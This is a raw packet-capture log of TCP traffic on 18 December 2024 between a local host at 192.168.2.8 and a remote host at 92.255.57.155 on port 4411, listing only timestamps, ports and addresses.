                                Dec 18, 2024 08:16:36.387437105 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.456221104 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.456345081 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.486013889 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.486224890 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.576065063 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.577898979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.578466892 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.647036076 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.647150993 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.753511906 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.753921032 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.766841888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.767179966 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.849848032 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:36.888806105 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:36.891962051 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.057356119 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.057913065 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.064619064 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.177623034 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.177709103 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.202970982 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.203093052 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.322653055 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.322714090 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.428365946 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.428447008 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.489238024 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.489293098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.548140049 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.608999968 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.726485968 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.728260994 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.853058100 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.853123903 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:37.960366964 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.972670078 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:37.972727060 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.039016962 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.092809916 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.092863083 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.151416063 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.151484966 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.212554932 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.213953018 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.271049023 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.335226059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.335300922 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.404742956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.454798937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.457943916 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.577426910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.648315907 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.650360107 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.769979000 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.839426994 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.841831923 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:38.961338043 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.961349964 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:38.965833902 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:39.085392952 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.159224987 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:39.278708935 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.278760910 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:39.398232937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.607222080 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.637499094 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:39.756989002 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.846527100 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:39.856187105 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:39.975732088 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.221287966 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:40.340758085 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.377831936 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:40.497636080 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.756258965 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.757913113 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:40.877414942 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.947964907 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:40.949831009 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:41.069844961 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.238039017 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:41.357629061 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.377814054 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:41.497307062 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.671236038 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.673227072 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:41.792910099 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.792967081 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:41.913671017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.938129902 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:41.939615965 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.101320028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.101381063 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.222027063 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.223191977 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.275763035 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.342668056 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.342736959 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.413501024 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.462851048 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.462929964 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.584371090 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.604480028 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.629843950 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.773736954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.795679092 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.797982931 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.817853928 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:42.981204033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:42.981352091 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.100883007 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.440444946 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.559945107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.560015917 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.679569006 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.679646015 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.799226999 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.799295902 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.873445034 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.873539925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.918833017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.918894053 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:43.993103981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:43.993163109 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.038369894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.064574003 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.157206059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.157274961 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.187114000 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.252326012 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.255537033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.255623102 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.276803970 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.276930094 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.375058889 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.375453949 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.437268972 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.437408924 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.556850910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.566317081 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.571175098 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.733161926 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.733309031 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.748033047 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.852775097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:44.852922916 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:44.972660065 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.158982038 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:46.278482914 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.591890097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:46.593476057 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:46.712925911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.065386057 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.185143948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.498676062 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.500355005 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.619965076 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.620035887 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.740937948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.753313065 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.872833967 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:47.872893095 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:47.992470980 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.049624920 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.112015963 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.169202089 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.169266939 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.289398909 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.303349972 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.305445910 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.360229969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.439868927 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.469264030 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.474790096 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.493884087 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.549206972 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.594330072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:48.595876932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:48.715362072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.237050056 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.356612921 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.356658936 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.476739883 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.476803064 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.596296072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.596402884 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.669826984 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.715955973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.716013908 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.835597992 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.835649014 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:49.860846043 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.997245073 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:49.997342110 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.026813030 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.051920891 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.051995039 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.116897106 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.117012024 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.171597958 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.237025976 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.325196981 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.327274084 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.446924925 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.516103029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.521845102 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.638150930 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.641364098 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.641544104 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.761132002 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.761244059 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:50.829185009 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.880808115 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:50.881934881 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.001571894 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.119723082 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.121850967 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.241314888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.241379023 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.360879898 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.393368006 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.512957096 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.513011932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.632519007 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.632575035 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.752322912 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.752379894 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.761497974 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.846082926 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.913661003 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:51.913726091 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:51.944454908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.033220053 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.033356905 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.063076019 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.134540081 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.134608030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.193245888 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.193422079 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.254075050 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.254235029 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.313256025 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.313467979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.433336020 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.445895910 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.448688984 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.504580021 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.549858093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.609426975 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.609713078 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.624346018 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.729275942 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.729516029 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:52.759401083 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:52.849859953 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.049230099 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.137454033 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.137496948 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.137643099 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.168926954 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.169296980 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.257293940 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.288781881 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.288830996 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.408265114 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.612123013 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.731662989 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.731753111 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.835046053 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.835103989 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.851231098 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.851285934 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.954683065 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.954755068 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:53.970736027 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:53.970792055 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.049025059 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.049240112 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.074278116 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.074534893 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.090270996 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.168993950 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.169050932 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.194015026 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.265642881 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.288650990 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.288794041 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.360678911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.409127951 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.409287930 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.480015993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.528961897 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.529083967 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.596301079 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.648689985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.648809910 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.670897961 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.752336979 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.787277937 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.787487030 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:54.949203014 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:54.949423075 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:55.069746017 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:55.784014940 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:55.903759956 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:55.971424103 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.091345072 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.112101078 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.216871023 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.231717110 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.231810093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.351308107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.408744097 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.411401033 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.531789064 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.645107985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:56.646506071 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:56.769304037 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.409894943 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:58.529447079 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.529565096 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:58.649218082 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:58.870136976 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.049870968 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.061120987 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.065875053 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.185307026 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.206286907 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.252048969 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.325901985 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.325992107 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.445509911 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.445561886 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.565068960 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.668998957 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.669934034 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.789355040 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.789428949 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:16:59.909122944 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.958950996 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:16:59.959986925 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:00.079488993 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:00.273669004 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:00.274717093 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:00.394208908 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.236984968 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.356506109 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.356587887 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.476097107 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.476144075 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.595721006 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.643399954 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.670111895 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.762830973 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.762882948 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.861176014 CET44114970892.255.57.155192.168.2.8
                                Dec 18, 2024 08:17:01.861248970 CET497084411192.168.2.892.255.57.155
                                Dec 18, 2024 08:17:01.882354975 CET44114970892.255.57.155192.168.2.8
